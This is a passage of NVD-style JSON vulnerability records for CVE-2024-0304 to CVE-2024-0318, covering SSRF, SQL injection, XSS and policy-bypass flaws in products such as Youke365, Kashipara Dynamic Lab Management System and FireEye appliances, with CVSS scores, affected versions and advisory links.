is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:youke365:youke_365:*:*:*:*:*:*:*:*", "versionStartIncluding" : "1.5.0", "versionEndIncluding" : "1.5.3", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-08T08:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0304", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/3jF3Xpl3ttlZ", "name" : "https://note.zhaoj.in/share/3jF3Xpl3ttlZ", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://note.zhaoj.in/share/3jF3Xpl3ttlZ", "name" : "https://note.zhaoj.in/share/3jF3Xpl3ttlZ", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.249871", "name" : "https://vuldb.com/?ctiid.249871", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249871", "name" : "https://vuldb.com/?ctiid.249871", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249871", "name" : "https://vuldb.com/?id.249871", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249871", "name" : "https://vuldb.com/?id.249871", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in Youke365 up to 1.5.3 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /app/api/controller/collect.php. The manipulation of the argument url leads to server-side request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249871." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:youke365:youke_365:*:*:*:*:*:*:*:*", "versionStartIncluding" : "1.5.0", "versionEndIncluding" : "1.5.3", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-08T08:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0305", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/2267787739/cve/blob/main/logic.md", "name" : "https://github.com/2267787739/cve/blob/main/logic.md", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://github.com/2267787739/cve/blob/main/logic.md", "name" : "https://github.com/2267787739/cve/blob/main/logic.md", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.249872", "name" : "https://vuldb.com/?ctiid.249872", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249872", "name" : "https://vuldb.com/?ctiid.249872", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249872", "name" : "https://vuldb.com/?id.249872", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249872", "name" : "https://vuldb.com/?id.249872", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Guangzhou Yingke Electronic Technology Ncast up to 2017 and classified as problematic. Affected by this issue is some unknown functionality of the file /manage/IPSetup.php of the component Guest Login. The manipulation leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249872." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ncast_project:ncast:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2007", "versionEndIncluding" : "2017", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-08T09:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0306", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Dynamic%20Lab%20Management%20System%20-%20vuln%201.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Dynamic%20Lab%20Management%20System%20-%20vuln%201.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Dynamic%20Lab%20Management%20System%20-%20vuln%201.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Dynamic%20Lab%20Management%20System%20-%20vuln%201.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249873", "name" : "https://vuldb.com/?ctiid.249873", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249873", "name" : "https://vuldb.com/?ctiid.249873", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249873", "name" : "https://vuldb.com/?id.249873", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249873", "name" : "https://vuldb.com/?id.249873", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Kashipara Dynamic Lab Management System up to 1.0. It has been classified as critical. This affects an unknown part of the file /admin/admin_login_process.php. The manipulation of the argument admin_password leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249873 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:lopalopa:dynamic_lab_management_system:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-08T09:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0307", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/VistaAX/vulnerablility/blob/main/Dynamic%20Lab%20Management%20System%20-%20vuln%202.pdf", "name" : "https://github.com/VistaAX/vulnerablility/blob/main/Dynamic%20Lab%20Management%20System%20-%20vuln%202.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/VistaAX/vulnerablility/blob/main/Dynamic%20Lab%20Management%20System%20-%20vuln%202.pdf", "name" : "https://github.com/VistaAX/vulnerablility/blob/main/Dynamic%20Lab%20Management%20System%20-%20vuln%202.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249874", "name" : "https://vuldb.com/?ctiid.249874", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249874", "name" : "https://vuldb.com/?ctiid.249874", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249874", "name" : "https://vuldb.com/?id.249874", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249874", "name" : "https://vuldb.com/?id.249874", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Kashipara Dynamic Lab Management System up to 1.0. It has been declared as critical. This vulnerability affects unknown code of the file login_process.php. The manipulation of the argument password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249874 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:lopalopa:dynamic_lab_management_system:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-08T10:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0308", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/2E2JG2PClHGF", "name" : "https://note.zhaoj.in/share/2E2JG2PClHGF", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://note.zhaoj.in/share/2E2JG2PClHGF", "name" : "https://note.zhaoj.in/share/2E2JG2PClHGF", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.249875", "name" : "https://vuldb.com/?ctiid.249875", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249875", "name" : "https://vuldb.com/?ctiid.249875", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249875", "name" : "https://vuldb.com/?id.249875", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249875", "name" : "https://vuldb.com/?id.249875", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Inis up to 2.0.1. It has been rated as critical. This issue affects some unknown processing of the file app/api/controller/default/Proxy.php. The manipulation of the argument p_url leads to server-side request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249875." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:inis_project:inis:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2.0.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-08T10:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0310", "ASSIGNER" : "trellixpsirt@trellix.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://kcm.trellix.com/corporate/index?page=content&id=SB10417", "name" : "https://kcm.trellix.com/corporate/index?page=content&id=SB10417", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://kcm.trellix.com/corporate/index?page=content&id=SB10417", "name" : "https://kcm.trellix.com/corporate/index?page=content&id=SB10417", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "\nA content-security-policy vulnerability in ENS Control browser extension prior to 10.7.0 Update 15 allows a remote attacker to alter the response header parameter setting to switch the content security policy into report-only mode, allowing an attacker to bypass the content-security-policy configuration. \n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:trellix:endpoint_security_web_control:*:*:*:*:*:*:*:*", "versionEndExcluding" : "10.7.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:trellix:endpoint_security_web_control:10.7.0:-:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-10T11:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0311", "ASSIGNER" : "trellixpsirt@trellix.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://kcm.trellix.com/corporate/index?page=content&id=SB10418", "name" : "https://kcm.trellix.com/corporate/index?page=content&id=SB10418", "refsource" : "", "tags" : [ ] }, { "url" : "https://kcm.trellix.com/corporate/index?page=content&id=SB10418", "name" : "https://kcm.trellix.com/corporate/index?page=content&id=SB10418", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A malicious insider can bypass the existing policy of Skyhigh Client Proxy without a valid release code." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-03-14T09:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0312", "ASSIGNER" : "trellixpsirt@trellix.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://kcm.trellix.com/corporate/index?page=content&id=SB10418", "name" : "https://kcm.trellix.com/corporate/index?page=content&id=SB10418", "refsource" : "", "tags" : [ ] }, { "url" : "https://kcm.trellix.com/corporate/index?page=content&id=SB10418", "name" : "https://kcm.trellix.com/corporate/index?page=content&id=SB10418", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A malicious insider can uninstall Skyhigh Client Proxy without a valid uninstall password." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-03-14T09:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0313", "ASSIGNER" : "trellixpsirt@trellix.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://kcm.trellix.com/corporate/index?page=content&id=SB10418", "name" : "https://kcm.trellix.com/corporate/index?page=content&id=SB10418", "refsource" : "", "tags" : [ ] }, { "url" : "https://kcm.trellix.com/corporate/index?page=content&id=SB10418", "name" : "https://kcm.trellix.com/corporate/index?page=content&id=SB10418", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A malicious insider exploiting this vulnerability can circumvent existing security controls put in place by the organization. On the contrary, if the victim is legitimately using the temporary bypass to reach out to the Internet for retrieving application and system updates, a remote device could target it and undo the bypass, thereby denying the victim access to the update service, causing it to fail. " } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-03-14T09:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0314", "ASSIGNER" : "cve-coordination@incibe.es" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "XSS vulnerability in FireEye Central Management affecting version 9.1.1.956704, which could allow an attacker to modify special HTML elements in the application and cause a reflected XSS, leading to a session hijacking." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fireeye:central_management:9.1.1.956704:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-15T16:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0315", "ASSIGNER" : "cve-coordination@incibe.es" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Remote file inclusion vulnerability in FireEye Central Management affecting version 9.1.1.956704. This vulnerability allows an attacker to upload a malicious PDF file to the system during the report creation process." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fireeye:central_management:9.1.1.956704:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-15T16:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0316", "ASSIGNER" : "cve-coordination@incibe.es" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Improper cleanup vulnerability in exceptions thrown in FireEye Endpoint Security, affecting version 5.2.0.958244. This vulnerability could allow an attacker to send multiple request packets to the containment_notify/preview parameter, which could lead to a service outage." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fireeye:endpoint_security:5.2.0.958244:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-15T16:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0317", "ASSIGNER" : "cve-coordination@incibe.es" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Cross-Site Scripting in FireEye EX, affecting version 9.0.3.936727. Exploitation of this vulnerability allows an attacker to send a specially crafted JavaScript payload via the 'type' and 's_f_name' parameters to an authenticated user to retrieve their session details." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fireeye:ex_5500_firmwarea:9.0.3.936727:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:fireeye:ex_5500:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fireeye:ex_8500_firmware:9.0.3.936727:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:fireeye:ex_8500:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fireeye:ex_3500_firmware:9.0.3.936727:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:fireeye:ex_3500:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-15T17:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0318", "ASSIGNER" : "cve-coordination@incibe.es" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Cross-Site Scripting in FireEye HXTool affecting version 4.6. This vulnerability allows an attacker to store a specially crafted JavaScript payload in the 'Profile Name' and 